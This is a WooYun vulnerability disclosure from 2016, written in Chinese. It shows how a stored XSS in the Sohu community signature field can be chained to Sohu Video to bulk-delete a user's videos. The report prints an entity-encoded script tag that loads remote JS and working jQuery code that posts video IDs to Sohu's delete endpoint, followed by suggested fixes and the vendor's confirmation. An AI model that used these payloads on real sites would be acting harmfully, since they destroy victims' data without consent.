当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168610

漏洞标题:利用搜狐视频XSS批量删除用户视频

相关厂商:搜狐

漏洞作者: q601333824

提交时间:2016-01-11 12:40

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:XSS 跨站脚本攻击

危害等级:中

自评Rank:9

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

利用搜狐视频XSS批量删除用户视频

详细说明:


1.上次搜狐的邮箱的域已经修改成mail.sohu.com
2.但是搜狐视频的域还是sohu.com,如图

1.png


3.其他内容看这个漏洞,然后我从例子开始说

 WooYun: 利用搜狐邮箱XSS劫持用户邮件 


4.可以从搜狐社区,获取搜狐视频的内容,如图

2.png


---------------------------------------------------------------------------------------
5.上次说的搜狐社区XSS还没有修复,还是能用,能加载外部JS(不要在意状态404,为了演示插入一个没有的页面演示,这样就没危害了)
6.签名档插入代码

<br>&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#32;&#115;&#114;&#99;&#61;&#34;http://q601333824.sinaapp.com/xss1.js&#34;


3.png


------------------------------------------------------------------------------------------
7.具体利用方法就是,获取用户视频列表的视频id,然后post请求删除,这个页面可以显示出用户一页视频

http://my.tv.sohu.com/user/video/list.do


4.png


5.png


8.这一段是我自己写的的JS代码,这个代码只删除一页视频,先获取当前页面所有视频id,然后把视频ID交给post函数循环删除.

var obj=$(".item.cfix");
var changdu=obj.length;
if(changdu!=0){
function post(id){
alert(id);
$.post("http://my.tv.sohu.com/user/a/wvideo/deletevideos.do",
{"vids":id
},
function(data,stat){
if(stat=="success"){
alert("删除成功");
}else{
alert("删除失败");
}
}

);
}
for(var i=0;i<changdu;i++){
var id=obj[i].getAttribute("data-vid");
post(id);
}
}else{
alert("对不起,您没有上传视频");
}


9.至于批量删除,可以实现的,因为一页显示10个视频,计算出总页数,也就是删除次数

删除次数=Math.ceil(总视频数量 / 10)


---------------------------------------------------------------------------------------------
10.下面直接测试图片(这次不要加载w3c菜鸟教程的库了,因为搜狐视频支持post)

①.我把每次获取的视频编号弹出来一次,这是其中一个视频

6.png


②.删除成功

7.png


③.那么多的post请求,返回删除成功

8.png


④.视频列表全没了(这我自己的号,不是别的,别打我)

111111.png




漏洞证明:

1.漏洞证明看上面
2下面直接测试图片(这次不要加载w3c菜鸟教程的库了,因为搜狐视频支持post)

①.我把每次获取的视频编号弹出来一次,这是其中一个视频

6.png


②.删除成功

7.png


③.那么多的post请求,返回删除成功

8.png


④.视频列表全没了(这我自己的号,不是别的,别打我)

111111.png


修复方案:


1.可以在网页代码加上这句话

document.domain="tv.sohu.com"


2.也可以试试

x-frame-options


3.补充一下,我测试删的是我视频,没删别人的(=_=)

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-11 18:25

厂商回复:

感谢指出问题.我们正在与业务线协商解决方案.

最新状态:

暂无